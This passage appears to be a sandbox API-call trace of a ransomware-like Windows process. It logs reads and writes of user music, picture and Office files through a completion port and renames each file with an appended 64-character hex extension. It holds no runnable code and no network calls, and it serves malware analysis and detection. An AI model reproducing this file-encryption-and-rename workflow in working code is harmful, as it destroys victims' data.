dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.050] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.051] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav", lpString2=".0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav.0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\MTyX.wav.0DA0440BE97A17DEBF7C737650AF236BAD668E77A9FB823959BC9AFA5875192F" [0168.051] GetProcessHeap () returned 0x270000 [0168.051] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f9d50 [0168.051] NtSetInformationFile (FileHandle=0x5e4, 
IoStatusBlock=0x702fa6c, FileInformation=0x42f9d50, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0168.053] CloseHandle (hObject=0x5e4) returned 1 [0168.054] GetProcessHeap () returned 0x270000 [0168.055] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.056] RtlInterlockedCompareExchange64 () returned 0x1 [0168.056] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.060] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.060] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.062] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.063] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav", lpString2=".D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav.D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\AXXYp8jRfDs2.wav.D9A4B71D0FFB42F35CEB658D075C0C89EC22682086B80B0B7F96088E577AD523" [0168.063] 
GetProcessHeap () returned 0x270000 [0168.063] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x152) returned 0x35ba10 [0168.063] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x35ba10, Length=0x152, FileInformationClass=0xa) returned 0x0 [0168.064] CloseHandle (hObject=0x58c) returned 1 [0168.065] GetProcessHeap () returned 0x270000 [0168.067] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.067] RtlInterlockedCompareExchange64 () returned 0x1 [0168.067] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.070] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.070] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.072] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x74c20b8, ReturnLength=0x702fa7c) returned 0x0 [0168.073] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav", lpString2=".33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav.33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\RX0-yPNI7DvLWFXy1\\BA6j3JLUworAXTFvl0mV.wav.33E83227678524E89941250E22933E86763985F343C8600746CD9F034E7E8445" [0168.073] GetProcessHeap () returned 0x270000 [0168.073] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7421510 [0168.074] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x702fa6c, FileInformation=0x7421510, Length=0x162, FileInformationClass=0xa) returned 0x0 [0168.075] CloseHandle (hObject=0x58c) returned 1 [0168.076] GetProcessHeap () returned 0x270000 [0168.078] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0168.078] RtlInterlockedCompareExchange64 () returned 0x1 [0168.078] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.081] ReadFile (in: hFile=0x58c, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0168.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.283] ReadFile (in: hFile=0x5e4, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0168.283] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, 
lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.296] NtQueryObject (in: Handle=0x5cc, ObjectInformationClass=0x1, ObjectInformation=0x75aa780, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x75aa780, ReturnLength=0x702fa7c) returned 0x0 [0168.349] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg", lpString2=".FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg.FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\2 Kw\\mVHSolkg25ErZnMeoaY9.jpg.FAD3113C82AA3C65B4701748669FAC213E39F49B34E5EC3A38898F2695323406" [0168.349] GetProcessHeap () returned 0x270000 [0168.349] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4257eb8 [0168.349] NtSetInformationFile (FileHandle=0x5cc, IoStatusBlock=0x702fa6c, FileInformation=0x4257eb8, Length=0x142, FileInformationClass=0xa) returned 0x0 [0168.358] CloseHandle (hObject=0x5cc) returned 1 [0168.359] GetProcessHeap () returned 0x270000 [0168.360] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75aa6d0 | out: hHeap=0x270000) returned 1 [0168.387] RtlInterlockedCompareExchange64 () returned 0x1 [0168.387] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.388] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x73e00f8, ReturnLength=0x702fa7c) returned 0x0 [0168.389] lstrcatW (in: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav", lpString2=".F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav.F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\4KhlAV sb2I\\do_zPXXY6WZzpCYf02s.wav.F98467A0C6DD0BF7DE1556A7FED40D25E106C9CC144BFB3511A0A550B4178D4C" [0168.389] GetProcessHeap () returned 0x270000 [0168.390] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x138) returned 0x7418450 [0168.390] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x702fa6c, FileInformation=0x7418450, Length=0x138, FileInformationClass=0xa) returned 0x0 [0168.391] CloseHandle (hObject=0x5b0) returned 1 [0168.393] GetProcessHeap () returned 0x270000 [0168.394] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.394] RtlInterlockedCompareExchange64 () returned 0x0 [0168.394] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.398] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x76900b8, ReturnLength=0x702fa7c) returned 0x0 [0168.400] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a", lpString2=".D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a.D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\SkVxCvpKdtQjOiR8Ir9y.m4a.D7C2D9BE17AC69FF7B13DC1AC8A6B224B4F796E0FA7DDCB83FEF94A06FEB440D" [0168.400] GetProcessHeap () returned 0x270000 [0168.400] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x4332e00 [0168.400] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x702fa6c, FileInformation=0x4332e00, Length=0x122, FileInformationClass=0xa) returned 0x0 [0168.401] CloseHandle (hObject=0x5ac) returned 1 [0168.403] GetProcessHeap () returned 0x270000 [0168.404] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0168.404] RtlInterlockedCompareExchange64 () returned 0x1 [0168.404] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0168.407] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x7608250, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x7608250, ReturnLength=0x702fa7c) returned 0x0 [0168.409] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav", lpString2=".8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav.8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Music\\tdPwiKvOmFwgvO.wav.8413491B1ECF2217F929DFCAB92C57C7BD93B96BF674A033916BB901C22BEA1A" [0168.409] GetProcessHeap () returned 0x270000 [0168.409] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x116) returned 0x4333f60 [0168.410] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x702fa6c, FileInformation=0x4333f60, Length=0x116, FileInformationClass=0xa) 
returned 0x0 [0168.413] CloseHandle (hObject=0x5a4) returned 1 [0168.413] GetProcessHeap () returned 0x270000 [0168.415] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76081a0 | out: hHeap=0x270000) returned 1 [0168.423] RtlInterlockedCompareExchange64 () returned 0x1 [0168.423] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.317] ReadFile (in: hFile=0x5b8, lpBuffer=0x7779140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008 | out: lpBuffer=0x7779140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7759008) returned 1 [0169.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.319] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x77590b8, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x77590b8, ReturnLength=0x702fa7c) returned 0x0 [0169.321] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png", lpString2=".A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png.A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\Ys-I5cZz8VrpRcO.png.A00C75CE8EAD87A8AD0FF5EE475C7ABF821C70888BEBFB1095C69E21C31FFA5F" [0169.321] GetProcessHeap () returned 0x270000 [0169.321] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x4334400 [0169.321] NtSetInformationFile (FileHandle=0x5b8, 
IoStatusBlock=0x702fa6c, FileInformation=0x4334400, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.322] CloseHandle (hObject=0x5b8) returned 1 [0169.324] GetProcessHeap () returned 0x270000 [0169.325] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0169.325] RtlInterlockedCompareExchange64 () returned 0x1 [0169.325] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0169.326] WriteFile (in: hFile=0x5a4, lpBuffer=0x75ca140*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008 | out: lpBuffer=0x75ca140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa008) returned 1 [0169.327] RtlInterlockedCompareExchange64 () returned 0x0 [0169.327] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0170.924] ReadFile (in: hFile=0x590, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x5c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0170.942] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0170.946] WriteFile (in: hFile=0x5dc, lpBuffer=0x7701188*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x76e1050) returned 1 [0170.947] 
RtlInterlockedCompareExchange64 () returned 0x0 [0170.947] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.646] ReadFile (in: hFile=0x5dc, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0171.647] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.670] ReadFile (in: hFile=0x604, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0171.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.689] ReadFile (in: hFile=0x594, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0171.689] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0171.692] WriteFile (in: hFile=0x5cc, lpBuffer=0x7909298*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x78e9160 | out: lpBuffer=0x7909298*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x78e9160) returned 1 [0171.833] RtlInterlockedCompareExchange64 () returned 0x3 [0171.833] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80) returned 1 [0172.034] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x702fa7c | out: ObjectInformation=0x750a500, ReturnLength=0x702fa7c) returned 0x0 [0172.035] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg", lpString2=".89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21") returned="\\Device\\HarddiskVolume1\\Users\\Public\\Pictures\\Sample Pictures\\Penguins.jpg.89240EEF8F03E26BED2DA02CCEC6B58F2953A6A21B721B40C7EFB9A84F67CD21" [0172.035] GetProcessHeap () returned 0x270000 [0172.035] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x4333a30 [0172.035] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x702fa6c, FileInformation=0x4333a30, Length=0x128, FileInformationClass=0xa) returned 0x0 [0172.131] CloseHandle (hObject=0x5d8) returned 1 [0172.131] GetProcessHeap () returned 0x270000 [0172.133] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0172.136] RtlInterlockedCompareExchange64 () returned 0x4 [0172.136] GetQueuedCompletionStatus (CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x702fa88, lpCompletionKey=0x702fa84, lpOverlapped=0x702fa80, dwMilliseconds=0xffffffff) Thread: id = 108 os_tid = 0xadc [0142.352] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.030] ReadFile (in: hFile=0x598, lpBuffer=0x74ba5a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x749a470 | out: lpBuffer=0x74ba5a8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x749a470) returned 1 [0156.030] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.031] WriteFile (in: hFile=0x598, lpBuffer=0x74ba5a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x749a470 | out: lpBuffer=0x74ba5a8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x749a470) returned 1 [0156.046] RtlInterlockedCompareExchange64 () returned 0x0 [0156.046] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.304] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x4a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.305] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.315] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x4a00, lpNumberOfBytesWritten=0x0, 
lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.317] RtlInterlockedCompareExchange64 () returned 0x0 [0156.317] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0156.346] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x744a270, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x744a270, ReturnLength=0x422f7cc) returned 0x0 [0156.347] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml", lpString2=".1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.onenotemui.msi.16.en-us.xml.1693D172FBC5F146785C988C6560B0FCD4A0177C5482CCF2E4A143A646090E0B" [0156.347] GetProcessHeap () returned 0x270000 [0156.347] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a2) returned 0x42781a0 [0156.347] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x422f7bc, FileInformation=0x42781a0, Length=0x1a2, FileInformationClass=0xa) returned 0x0 [0156.350] CloseHandle (hObject=0x598) returned 1 [0156.354] GetProcessHeap () returned 0x270000 [0156.356] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x744a1c0 | out: hHeap=0x270000) returned 1 [0156.357] RtlInterlockedCompareExchange64 () returned 0x5 [0156.358] GetQueuedCompletionStatus (in: 
